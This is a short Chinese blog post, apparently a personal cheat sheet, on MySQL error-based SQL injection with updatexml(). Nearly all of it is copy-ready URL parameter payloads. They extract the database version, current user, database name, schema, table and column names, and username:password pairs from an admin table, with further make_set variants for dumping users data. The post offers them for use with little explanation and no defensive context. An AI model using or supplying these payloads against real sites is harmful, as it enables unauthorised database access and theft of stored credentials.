sql注入-updatexml报错注入
2019-09-15 本文已影响0人
简言之_
图片.png
图片.png
爆数据库版本信息
?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
链接用户
?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
链接数据库
?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆库
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆表
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段内容
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
爆表名
?no=1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#
爆列名
?no=1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#
爆字段
?no=1 and updatexml(1,make_set(3,'~',(select data from users)),1)#
参考:
MySQL updatexml报错注入
MySQL updatexml()、extractvalue() 报错型SQL注入
updatexml injection without concat
mysql MAKE_SET()用法
# Xpath语法格式整理
